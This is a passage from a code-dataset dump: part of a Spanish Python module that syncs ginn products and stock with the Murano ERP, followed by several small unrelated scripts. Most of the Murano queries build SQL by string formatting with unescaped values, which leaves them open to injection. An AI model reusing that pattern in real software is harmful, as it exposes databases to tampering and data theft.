_get_dimensiones_murano(articulo):\n \"\"\"\n Devuelve el peso bruto, neto y metros cuadrados que guarda Murano para el\n artículo de ginn recibido.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT PesoBruto_, PesoNeto_, MetrosCuadrados\n FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n result = conn.run_sql(SQL)[0]\n except IndexError:\n peso_bruto, peso_neto, superficie = None, None, None\n else:\n peso_bruto = result['PesoBruto_']\n peso_neto = result['PesoNeto_']\n superficie = result['MetrosCuadrados']\n peso_bruto = float(peso_bruto)\n peso_neto = float(peso_neto)\n superficie = float(superficie)\n return peso_bruto, peso_neto, superficie\n\n\ndef _get_calidad_murano(articulo):\n \"\"\"\n Devuelve un caracter con la calidad del artículo (A, B ó C) en Murano para\n el artículo de ginn recibido.\n Devuelve None si el artículo no existe, cadena vacía si no tiene calidad y\n la letra que tenga en Murano si la tiene.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT CodigoTalla01_\n FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo,\n CODEMPRESA)\n try:\n result = conn.run_sql(SQL)[0]\n except IndexError:\n calidad = None\n else:\n calidad = result['CodigoTalla01_']\n return calidad\n\n\ndef _get_codigo_pale(articulo):\n \"\"\"\n Devuelve el código de palé que tiene el artículo de ginn en Murano.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT CodigoPale FROM %s.dbo.ArticulosSeries\n WHERE NumeroSerieLc = '%s'\n AND CodigoEmpresa = '%s';\"\"\" % (conn.get_database(),\n articulo.codigo, CODEMPRESA)\n try:\n codigo_pale = conn.run_sql(SQL)[0]['CodigoPale']\n except IndexError:\n codigo_pale = None\n return codigo_pale\n\n\ndef corregir_pale(articulo, pale=None):\n \"\"\"\n Corrige el valor del campo CodigoPale en Murano para el artículo de acuerdo\n al palé o al código de palé recibido.\n \"\"\"\n if not pale:\n pale = articulo.caja.pale\n try:\n codigo_pale = pale.codigo\n except AttributeError:\n codigo_pale = pale\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"UPDATE %s.dbo.ArticulosSeries\n SET CodigoPale = '%s'\n WHERE CodigoEmpresa = '%s'\n AND NumeroSerieLc = '%s';\"\"\" % (conn.get_database(),\n codigo_pale,\n CODEMPRESA,\n articulo.codigo)\n res = conn.run_sql(SQL)\n return res\n\n\ndef get_producto_murano(codigo):\n \"\"\"\n Devuelve el registro `Articulos` de Murano que coincide con el código\n (de Murano) recibido. El valor devuelto es un diccionario cuyas claves\n son los nombres de los campos o None si no lo encuentra.\n \"\"\"\n if isinstance(codigo, pclases.ProductoVenta):\n codigo = \"PV{}\".format(codigo.id)\n elif isinstance(codigo, pclases.ProductoCompra):\n codigo = \"PC{}\".format(codigo.id)\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n SQL = r\"\"\"SELECT * FROM %s.dbo.Articulos\n WHERE CodigoEmpresa = '%s'\n AND CodigoArticulo = '%s';\"\"\" % (conn.get_database(),\n CODEMPRESA, codigo)\n try:\n prod_murano = conn.run_sql(SQL)[0]\n prod_murano = AttrDict(prod_murano)\n except IndexError:\n strerr = \"El código %s no existe en Murano.\" % (codigo)\n logging.error(strerr)\n prod_murano = None\n return prod_murano\n\n\ndef producto_murano2ginn(codigo, sync=False):\n \"\"\"\n Vuelca el produco de Murano del código recibido en ginn.\n Respeta el ID de Murano en ginn.\n Si el ID ya existe, machaca la información de ginn con la de Murano si\n el flag «sync» está activo. En otro caso, lanza una excepción.\n \"\"\"\n # p y l i n t: disable=redefined-variable-type\n prod_murano = get_producto_murano(codigo)\n if not prod_murano:\n strerr = \"El código %s no existe en Murano.\" % (codigo)\n raise ValueError(strerr)\n try:\n prod_ginn = get_producto_ginn(codigo)\n except pclases.SQLObjectNotFound:\n res = _create_producto_ginn(prod_murano)\n else:\n if sync:\n res = _update_producto_ginn(prod_ginn, prod_murano)\n else:\n res = None\n return res\n\n\ndef _create_producto_ginn(prod_murano):\n \"\"\"\n Recibe un producto de Murano en forma de diccionario cuyas claves son los\n nombres de los campos y los valores, sus valores.\n Crea un producto en ginn con el ID de Murano y devuelve el objeto\n recién creado.\n \"\"\"\n # p y l i n t: disable=redefined-variable-type\n id_murano = prod_murano['CodigoArticulo']\n if \"PV\" in id_murano:\n res = _create_producto_venta_ginn(prod_murano)\n elif \"PC\" in id_murano:\n res = _create_producto_compra_ginn(prod_murano)\n else:\n raise ValueError(\"Producto {} no soportado.\".format(id_murano))\n return res\n\n\ndef _create_producto_compra_ginn(prod_murano):\n \"\"\"\n Crea un producto de compra en ginn con los datos de prod_murano.\n \"\"\"\n id_murano = prod_murano['CodigoArticulo']\n ide = int(id_murano.replace(\"PC\", \"\"))\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n pc = pclases.ProductoCompra(id=ide)\n _update_producto_ginn(pc, prod_murano)\n return pc\n\n\ndef _create_producto_venta_ginn(prod_murano):\n \"\"\"\n Crea un producto de venta en ginn con los atributos de prod_murano.\n \"\"\"\n id_murano = prod_murano['CodigoArticulo']\n ide = int(id_murano.replace(\"PV\", \"\"))\n try:\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n pv = pclases.ProductoVenta(id=ide)\n if prod_murano['CodigoAreaCompetenciaLc'] == \"ROLLO\":\n pv.camposEspecificosRollo = pclases.CamposEspecificosRollo()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"BALA\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"CAJA\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n elif prod_murano['CodigoAreaCompetenciaLc'] == \"BIGBAG\":\n pv.camposEspecificosBala = pclases.CamposEspecificosBala()\n else:\n strerror = \"El producto {} no tiene indicado si es rollo, bala, \"\\\n \"caja o bigbag en Murano (campo «Área \"\\\n \"competencia»).\".format(prod_murano['CodigoArticulo'])\n print(strerror)\n logging.error(strerror)\n pv.destroySelf()\n pv = None\n # pylint: disable=broad-except\n except Exception as excepcion:\n # TODO: Hasta que lea directamente el producto de Murano\n # desde el parte y laboratorio, sincronizar manualmente con estas\n # funciones.\n strerror = \"El producto {} no se pudo crear en ginn.\"\\\n \" Expceción: {}\".format(prod_murano['CodigoArticulo'],\n excepcion)\n print(strerror)\n logging.error(strerror)\n pv = None\n else:\n if pv:\n _update_producto_ginn(pv, prod_murano)\n return pv\n\n\ndef _update_producto_ginn(prod_ginn, prod_murano):\n \"\"\"\n Recibe un producto de ginn y otro de Murano en forma de diccionario.\n Actualiza los campos de ginn según los valores del de Murano.\n Devuelve None si no se pudo actualizar, y el producto de ginn sí se pudo.\n \"\"\"\n res = None\n if isinstance(prod_ginn, pclases.ProductoCompra):\n res = _update_producto_compra_ginn(prod_ginn, prod_murano)\n elif isinstance(prod_ginn, pclases.ProductoVenta):\n res = _update_producto_venta_ginn(prod_ginn, prod_murano)\n return res\n\n\ndef _get_tipo_de_material(codigo):\n \"\"\"\n Devuelve el registro tipo de material de ginn correspondiente al código\n recibido de Murano.\n \"\"\"\n # pylint: disable=bad-continuation\n switcher = {'OIL': pclases.TipoDeMaterial.selectBy(\n descripcion='Aceites y lubricantes')[0],\n 'COM': pclases.TipoDeMaterial.selectBy(\n descripcion='Comercializados')[0],\n 'MAN': pclases.TipoDeMaterial.selectBy(\n descripcion='Mantenimiento')[0],\n 'MAP': pclases.TipoDeMaterial.selectBy(\n descripcion='Materia Prima')[0],\n 'GRANZA': pclases.TipoDeMaterial.selectBy(\n descripcion='Materia Prima')[0],\n 'MAT': pclases.TipoDeMaterial.selectBy(\n descripcion='Material adicional')[0],\n 'MIV': pclases.TipoDeMaterial.selectBy(\n descripcion='Mercancía inicial Valdemoro')[0],\n 'PCOM': pclases.TipoDeMaterial.selectBy(\n descripcion='Productos comercializados')[0],\n 'REF': pclases.TipoDeMaterial.selectBy(\n descripcion='Repuestos fibra')[0],\n 'REG': pclases.TipoDeMaterial.selectBy(\n descripcion='Repuestos geotextiles')[0]}\n return switcher.get(codigo, None)\n\n\ndef _update_producto_compra_ginn(prod_ginn, prod_murano):\n \"\"\"\n Actualiza los valores del producto de compra con los del producto en\n Murano.\n \"\"\"\n res = prod_ginn\n try:\n prod_ginn.descripcion = prod_murano['DescripcionArticulo']\n except UnicodeEncodeError:\n prod_ginn.descripcion = prod_murano['DescripcionArticulo'].encode(\n \"utf8\")\n prod_ginn.tipoDeMaterial = _get_tipo_de_material(\n prod_murano['CodigoFamilia'])\n prod_ginn.codigo = prod_murano['CodigoAlternativo']\n prod_ginn.unidad = prod_murano['UnidadMedida2_']\n prod_ginn.precioDefecto = prod_murano['PrecioVenta']\n # Si es Material (M) sí lo lleva. Si es Inmaterial o Comentario, no.\n prod_ginn.controlExistencias = prod_murano['TipoArticulo'] == \"M\"\n try:\n prod_ginn.observaciones = prod_murano['ComentarioArticulo']\n except UnicodeEncodeError:\n prod_ginn.observaciones = prod_murano.ComentarioArticulo.encode(\"utf8\")\n # Si está obsoleto para Murano, -1. Si no, 0\n prod_ginn.obsoleto = prod_murano['ObsoletoLc'] == -1\n try:\n proveedor = pclases.Proveedor.get(prod_murano['CodigoProveedor'])\n except (ValueError, pclases.SQLObjectNotFound):\n # Es un ID de un proveedor que no existe en ginn o está mal informado\n # en Murano y en lugar de un número es una cadena de texto.\n proveedor = None\n prod_ginn.proveedor = proveedor\n prod_ginn.minimo = prod_murano['StockMinimo']\n # Función de valoración y existencias ya no me interesan ni para sync.\n # prod_ginn.fvaloracion =\n # prod_ginn.existencias =\n return res\n\n\ndef _update_producto_venta_ginn(prod_ginn, prod_murano):\n \"\"\"\n Actualiza el registro de ginn conforme a los datos del registro de Murano.\n Tiene en cuenta el tipo de producto para actualizar también los valores\n de los registros relacionados camposEspecificos*.\n Se procura no machacar la descripción del producto en ginn. Admite más\n caracteres que en Murano y se usa para imprimir las etiquetas. Preferimos\n usar la descripción de ginn, que no está cortada para productos largos.\n \"\"\"\n res = _sync_campos_comunes_pv(prod_ginn, prod_murano)\n res = _sync_campos_especificos(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_campos_comunes_pv(prod_ginn, prod_murano):\n \"\"\"\n Copia en el registro prod_ginn los valores de prod_murano comunes a todos\n los productos de venta.\n \"\"\"\n res = prod_ginn\n prod_ginn.lineaDeProduccion = _get_linea_produccion_ginn(\n prod_murano.DescripcionLinea)\n try:\n prod_ginn.nombre = prod_murano.Descripcion2Articulo\n except UnicodeEncodeError:\n # Por un error de sqlobject, no parece estar reconociendo bien el\n # encoding. Lo fuerzo para los casos del PV581 en polaco, por ejemplo.\n connection = pclases.sqlhub.getConnection()\n connection.dbEncoding = \"utf-8\"\n prod_ginn.nombre = prod_murano.Descripcion2Articulo\n if prod_murano.DescripcionArticulo:\n try:\n prod_ginn.descripcion = prod_murano.DescripcionArticulo\n except UnicodeEncodeError:\n connection = pclases.sqlhub.getConnection()\n connection.dbEncoding = \"utf-8\"\n prod_ginn.descripcion = prod_murano.DescripcionArticulo\n prod_ginn.codigo = prod_murano.CodigoAlternativo\n prod_ginn.arancel = prod_murano.CodigoArancelario\n prod_ginn.prodestandar = prod_murano.GEO_ProdEstandar\n prod_ginn.annoCertificacion = prod_murano.GEO_anno_certificacion\n prod_ginn.dni = prod_murano.GEO_Dni\n prod_ginn.uso = _get_uso_ginn(prod_murano.GEO_Uso)\n prod_ginn.obsoleto = prod_murano.ObsoletoLc == -1\n return res\n\n\ndef _sync_campos_especificos(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos específicos del producto de ginn con los de Murano.\n \"\"\"\n if prod_ginn.camposEspecificosRollo:\n res = _sync_campos_especificos_rollo(prod_ginn, prod_murano)\n elif prod_ginn.camposEspecificosBala:\n res = _sync_campos_especificos_bala(prod_ginn, prod_murano)\n else:\n res = _sync_campos_especificos_especial(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_campos_especificos_rollo(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos relacionados con los geotextiles.\n \"\"\"\n res = prod_ginn\n cer = prod_ginn.camposEspecificosRollo\n if prod_murano.GEO_Cliente_id:\n if prod_murano.GEO_Cliente_id.startswith(\"C\"):\n # Como no admitimos id alfanuméricos y es poco probable que\n # lleguemos a un millón de clientes, uso los nuevos clientes\n # Cnnnnnn de Murano como 1nnnnnn en ginn.\n cliente_id = prod_murano.GEO_Cliente_id.replace(\"C\", \"1\")\n else:\n try:\n cliente_id = int(prod_murano.GEO_Cliente_id)\n except ValueError:\n cliente_id = prod_murano.GEO_Cliente_id\n try:\n cer.clienteID = cliente_id\n except TypeError:\n cer.clienteID = None\n res = False\n else:\n cer.clienteID = None\n if res:\n cer.gramos = prod_murano.GEO_gramos\n cer.codigoComposan = prod_murano.MarcaProducto\n cer.ancho = prod_murano.GEO_ancho\n cer.diametro = prod_murano.GEO_Diametro\n cer.rollosPorCamion = prod_murano.GEO_rollos_por_camion\n cer.metrosLineales = prod_murano.GEO_metros_lineales\n cer.pesoEmbalaje = prod_murano.GEO_peso_embalaje\n cer.modeloEtiqueta = _get_modelo_etiqueta_ginn(\n prod_murano.GEO_Modelo_etiqueta_id)\n cer.fichaFabricacion = prod_murano.GEO_Ficha_fabricacion\n res = _sync_marcado_ce(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_marcado_ce(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los valores del marcado CE. Si han cambiado, se crea un\n registro histórico del marcado actual en ginn.\n \"\"\"\n res = prod_ginn\n # TODO: PORASQUI\n return res\n\n\ndef _sync_campos_especificos_bala(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos relacionados con la fibra.\n \"\"\"\n res = prod_ginn\n ceb = prod_ginn.camposEspecificosBala\n ceb.dtex = prod_murano.GEO_Dtex\n ceb.corte = prod_murano.GEO_Corte\n ceb.color = prod_murano.GEO_Color\n ceb.antiuv = prod_murano.GEO_antiuv == -1\n ceb.tipoMaterialBalaID = _get_tipo_material_bala_ginn(\n prod_murano.GEO_Tipo_Material_bala_id)\n ceb.consumoGranza = prod_murano.GEO_Consumo_granza\n ceb.reciclada = prod_murano.GEO_Reciclada == -1\n ceb.gramosBolsa = prod_murano.GEO_gramos_bolsa\n ceb.bolsasCaja = prod_murano.GEO_bolsas_Caja\n ceb.cajasPale = prod_murano.GEO_Cajas_pale\n ceb.modeloEtiqueta = _get_modelo_etiqueta_ginn(\n prod_murano.GEO_Modelo_etiqueta_id)\n if prod_murano.GEO_Cliente_id:\n if prod_murano.GEO_Cliente_id.startswith(\"C\"):\n # Como no admitimos id alfanuméricos y es poco probable que\n # lleguemos a un millón de clientes, uso los nuevos clientes\n # Cnnnnnn de Murano como 1nnnnnn en ginn.\n cliente_id = prod_murano.GEO_Cliente_id.replace(\"C\", \"1\")\n else:\n try:\n cliente_id = int(prod_murano.GEO_Cliente_id)\n except ValueError:\n cliente_id = prod_murano.GEO_Cliente_id\n try:\n ceb.clienteID = cliente_id\n except TypeError:\n ceb.clienteID = None\n res = False\n else:\n ceb.clienteID = None\n return res\n\n\ndef _sync_campos_especificos_especial(prod_ginn, prod_murano):\n \"\"\"\n No sincroniza nada porque los productos con CamposEspecificosEspedoal\n son pocos y los campos, obsoletos.\n \"\"\"\n res = prod_ginn\n return res\n\n\ndef get_canal(producto):\n \"\"\"\n Busca el canal del producto en Murano y devuelve el código de canal\n (HARCODED en `connection`) correspondiente. None si en Murano no tiene\n canal informado.\n Acepta objeto de pclases o código (como cadena) directamente.\n Si el producto no existe, lanza una excepción.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_canal -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n canal = pmurano.CodigoCanal # pylint: disable=no-member\n try:\n cod_canal = CANALES[canal]\n except KeyError:\n cod_canal = None\n return cod_canal\n\n\ndef get_proyecto(producto):\n \"\"\"\n Busca el proyecto del producto en Murano y devuelve el código de proyecto\n (HARCODED en `connection`) correspondiente. Cero si en Murano no tiene\n proyecto informado («Sin informar»).\n Acepta objeto de pclases o código (como cadena) directamente.\n Si el producto no existe, lanza una excepción.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_proyecto -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n cod_proyecto = pmurano.CodigoProyecto # pylint: disable=no-member\n return cod_proyecto\n\n\ndef get_stock_murano(producto, _almacen=None, _calidad=None, _unidad=None):\n \"\"\"\n Devuelve un diccionario por almacén con el stock del producto recibido\n tanto en unidades base como específica y calidad (si se aplican).\n Si se especifica código de almacén o unidad, solo devuelve las existencias\n para ese almacén y unidad.\n Ejemplos:\n {'GTX': {'A': {'KG': 100, 'ROLLO': 2},\n 'B': {'KG': 500, 'ROLLO': 10}},\n 'SUS': {'A': {'KG': 500, 'ROLLO': 10}}}\n {'GTX': {'UD': 13},\n 'RES': {'UD': 0}}\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_stock_murano -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n res = {}\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n rs_ejercicio = conn.run_sql(\"\"\"SELECT MAX(Ejercicio) AS ejercicio\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {};\n \"\"\".format(conn.get_database(),\n CODEMPRESA))\n ejercicio = rs_ejercicio[0]['ejercicio']\n codempresa = CODEMPRESA\n database = conn.get_database()\n periodo = 99\n sql = \"\"\"SELECT CodigoAlmacen, CodigoTalla01_, TipoUnidadMedida_,\n UnidadSaldo, UnidadSaldoTipo_\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {}\n AND Ejercicio = {}\n AND CodigoArticulo = '{}'\n AND Periodo = {};\n \"\"\".format(database,\n codempresa,\n ejercicio,\n pmurano['CodigoArticulo'],\n periodo)\n rs = conn.run_sql(sql)\n # Tratamiento de datos: los meto en un diccionario bien estructurado.\n for registro in rs: # Cada registro, el acumulado de una partida\n almacen = registro['CodigoAlmacen']\n calidad = registro['CodigoTalla01_']\n if almacen not in res:\n res[almacen] = {}\n if calidad not in res[almacen]:\n res[almacen][calidad] = defaultdict(lambda: 0.0)\n stock_basica = registro['UnidadSaldo']\n stock_especifica = registro['UnidadSaldoTipo_']\n unidad_especifica = registro['TipoUnidadMedida_']\n unidad_basica = pmurano['UnidadMedida2_']\n if _unidad:\n if _unidad == unidad_especifica:\n res[almacen][calidad][unidad_especifica] += float(\n stock_especifica)\n elif _unidad == unidad_basica:\n res[almacen][calidad][unidad_basica] += float(stock_basica)\n else:\n res[almacen][calidad][unidad_basica] += float(stock_basica)\n res[almacen][calidad][unidad_especifica] += float(stock_especifica)\n # Ahora filtro por los valores recibidos:\n # La unidad se filtra arriba directamente. La unidad (KG, BALA...) siempre\n # se devuelve para saber en qué está el valor. A no ser que (y por\n # simplificar) si me piden un almacén concreto, calidad y una dimensión\n # concreta, solo tendré un valor en el diccionario. Lo devuelvo\n # directamente.\n if _almacen is not None and _calidad is not None and _unidad is not None:\n try:\n res = res[_almacen][_calidad][_unidad]\n except KeyError:\n # O no hay stock para ese almacén, o en esa calidad o la unidad\n # es errónea.\n # Por simplificar, si pide una cantidad en concreto devuelvo float.\n res = 0.0 # pylint: disable=redefined-variable-type\n else:\n if _calidad:\n _res = {}\n for almacen in res:\n try:\n _res[almacen] = res[almacen][_calidad]\n except KeyError:\n # Esa calidad no está presente en el almacén\n _res[almacen] = {}\n res = _res\n if _almacen:\n res = res[_almacen]\n return res\n","repo_name":"pacoqueen/ginn","sub_path":"ginn/api/murano/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":160420,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"42691994975","text":"\"\"\"\nThis file contains sample outputs of the TimeSformer model for each of the 6 different emotions.\n\nThis code was written and designed by Christopher du Toit.\n\"\"\"\n\nimport torch\nfrom timesformer.models.vit import TimeSformer\nfrom timesformer.datasets.decoder import decode\nimport os\nimport numpy as np\nimport pickle\nimport av\n\n\ndef load_np(filename):\n with open(os.path.join(r'C:\\Users\\Gebruiker\\Documents\\GitHub\\Research Internship extra', filename), 'rb') as r:\n video_arr = np.load(r)\n r.close()\n return video_arr\n\ndef load_video(filename):\n filename = os.path.join(r\"C:\\Users\\Gebruiker\\Documents\\GitHub\\Research_internship\", filename)\n video_container = av.open(filename)\n return video_container\n\ndef tensor_normalize(tensor, mean, std):\n if tensor.dtype == torch.uint8:\n tensor = tensor.float()\n tensor = tensor / 255.0\n\n if type(mean) == list:\n mean = torch.tensor(mean)\n\n if type(std) == list:\n std = torch.tensor(std)\n\n tensor = tensor - mean\n tensor = tensor / std\n return tensor\n\n\ndef timesformer_pred(filename, load_numpy=True):\n if load_numpy:\n video_arr = load_np(filename)\n video_torch = torch.from_numpy(video_arr)\n else:\n video_container = load_video(filename)\n video_torch = decode(video_container, 32, 8, -1, 1, )\n video_torch = tensor_normalize(video_torch, [0.45, 0.45, 0.45], [0.225, 0.225, 0.225])\n video_torch = video_torch.permute(3, 0, 1, 2)\n video_torch = torch.index_select(video_torch, 1, torch.linspace(0, video_torch.shape[1] - 1, 8).long(), )\n video_torch = video_torch.unsqueeze(0)\n pred = model(video_torch,)\n print_top_classes(pred)\n return video_torch\n\n\ndef print_top_classes(predictions, **kwargs):\n # Print Top-5 predictions\n prob = torch.softmax(predictions, dim=1)\n class_indices = predictions.data.topk(5, dim=1)[1][0].tolist()\n max_str_len = 0\n class_names = []\n for cls_idx in class_indices:\n class_names.append(labels[cls_idx])\n if len(labels[cls_idx]) > max_str_len:\n max_str_len = len(labels[cls_idx])\n\n print('Top 5 classes:')\n for cls_idx in class_indices:\n output_string = '\\t{} : {}'.format(cls_idx, labels[cls_idx])\n output_string += ' ' * (max_str_len - len(labels[cls_idx])) + '\\t\\t'\n output_string += 'value = {:.3f}\\t prob = {:.1f}%'.format(predictions[0, cls_idx], 100 * prob[0, cls_idx])\n print(output_string)\n\ndef topks_correct(preds, labels, ks):\n _top_max_k_vals, top_max_k_inds = torch.topk(\n preds, max(ks), dim=1, largest=True, sorted=True\n )\n top_max_k_inds = top_max_k_inds.t()\n rep_max_k_labels = labels.view(1, -1).expand_as(top_max_k_inds)\n top_max_k_correct = top_max_k_inds.eq(rep_max_k_labels)\n topks_correct = [top_max_k_correct[:k, :].float().sum() for k in ks]\n return topks_correct\n\n\nwith open(r\"C:\\Users\\Gebruiker\\Documents\\GitHub\\TimeSformer\\Results\\results_output\", 'rb') as f:\n x = pickle.load(f)\n\nf.close()\ntotal_correct = topks_correct(x[0], x[1], [1])\n\n\nmodel = TimeSformer(img_size=224, num_classes=6, num_frames=8, attention_type='divided_space_time', pretrained_model=r'C:\\Users\\Gebruiker\\Documents\\GitHub\\TimeSformer\\checkpoints\\checkpoint_epoch_00015.pyth')\nmodel.train()\nlabels = {0: 'happy', 1: 'sad', 2: 'anger', 3: 'fear', 4: 'disgust', 5: 'neutral'}\n\nfilename = os.path.join('avi_videos', '1025_MTI_HAP_XX.avi')\ntrue_label = 0\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][258], x[1][258])\n\nfilename = os.path.join('avi_videos', '1003_TAI_SAD_XX.avi')\ntrue_label = 1\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][259], x[1][259])\n\nfilename = os.path.join('avi_videos', '1052_TIE_ANG_XX.avi')\ntrue_label = 2\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][32], x[1][32])\n\nfilename = os.path.join('avi_videos', '1045_TSI_FEA_XX.avi')\ntrue_label = 3\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][75], x[1][75])\n\nfilename = os.path.join('avi_videos', '1014_TSI_DIS_XX.avi')\ntrue_label = 4\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][307], x[1][307])\n\nfilename = os.path.join('avi_videos', '1014_IWW_NEU_XX.avi')\ntrue_label = 5\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][269], x[1][269])\n\nexit(1)\n\nfilename = os.path.join('avi_custom', 'happy.avi')\ntrue_label = 0\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\n\n\nfilename = os.path.join('avi_custom', 'anger.avi')\ntrue_label = 1\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\n","repo_name":"chrisdt1998/Research_internship","sub_path":"timesformer_output.py","file_name":"timesformer_output.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34437627748","text":"import os\nimport time\nfrom requests import get\nfrom twilio.rest import Client\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef sendMessage(ipAddress):\n client = Client(os.getenv(\"SID\"), os.getenv(\"AUTH\"))\n \n message = client.messages.create(\n \tfrom_ = os.getenv(\"TWILIO_NUMBER\"),\n \tbody = '{} is the new External IP'.format(ipAddress),\n \tto = os.getenv(\"PERSONAL_NUMBER\")\n )\n \n print(message.sid)\n\ndef get_ip():\n\tip = get('https://api.ipify.org').content.decode('utf8')\n\treturn '{}'.format(ip)\n\ndef main():\n\tprint(\"check_my_ip.py is running.\")\n\tip_checker = False\n\n\twhile ip_checker == False:\n\t\tf = open(\"ip.txt\", \"r\")\n\t\tip = f.readline()\n\t\tf.close()\n\n\t\tif str(ip) == str(get_ip()):\n\t\t\tprint(\"Same IP.\")\n\t\t\ttime.sleep(3600)\n\t\telse:\n\t\t\tprint(\"Sending new IP to {}\".format(os.getenv(\"PERSONAL_NUMBER\")))\n\t\t\tsendMessage(str(get_ip()))\n\n\t\t\tf = open(\"ip.txt\", \"w\")\n\t\t\tf.write(str(get_ip()))\n\t\t\tf.close()\n\t\t\ttime.sleep(3600)\n\nmain()\n\n\n\n\n\n\n\n","repo_name":"natefoxr/CheckMyIp","sub_path":"check_my_ip.py","file_name":"check_my_ip.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37869037481","text":"from socket import *\n\n\ndef create_server():\n\n server_socket = socket(AF_INET, SOCK_STREAM)\n\n try:\n server_socket.bind(('10.242.3.167', 8089))\n print(\"HERE\")\n server_socket.listen(5)\n while True:\n\n (clientSocket, address) = server_socket.accept()\n\n rd = clientSocket.recv(5000).decode()\n pieces = rd.split(\"\\n\")\n if len(pieces) > 0:\n print(pieces[0])\n\n data = \"HTTP/1.1 200 OK\\r\\n\" \\\n \"Content-Type: text/html; charset-utf-8\\r\\n\" \\\n \"\\r\\n\" \\\n \"Hello my friend 1\\r\\n\\r\\n\"\n\n clientSocket.sendall(data.encode())\n clientSocket.shutdown(SHUT_WR)\n\n except KeyboardInterrupt:\n print(\"\\nshutting down...\\n\")\n\n except Exception as exc:\n print(\"Error : \", end=\"\")\n print(exc)\n\n server_socket.close()\n\n\ncreate_server()\n","repo_name":"alibhr/GTU_Assignments","sub_path":"CSE476-Mobile_Communication_Networks/server-client-example/simple_server.py","file_name":"simple_server.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3877342059","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.views.generic.base import RedirectView\n\nurlpatterns = [\n path('', include('pages.urls')),\n path('cocktails/', include('cocktails.urls')),\n path('cocktails/alcohol_categories/', include('alcohol.urls')),\n path('cocktails/categories/', include('drink_categories.urls')),\n path('cocktails/glass_types/', include('drink_glass_types.urls')),\n path('blogs/', include('blogs.urls')),\n path('blogs/categories/', include('blog_categories.urls')),\n path('events/', include('events.urls')),\n path('events/categories/', include('categories.urls')),\n path('events/event_types/', include('event_types.urls')),\n path('county/', include('counties.urls')),\n path('accounts/', include('allauth.urls')),\n path('contacts/', include('contacts.urls')),\n path('clubs/', include('clubs.urls')),\n path('genres/', include('genres.urls')),\n path('', include('google_analytics.urls')),\n path('admin/', admin.site.urls),\n # google adsense redirect configuration\n path('ads.txt', RedirectView.as_view(url=staticfiles_storage.url('ads.txt'))),\n] + 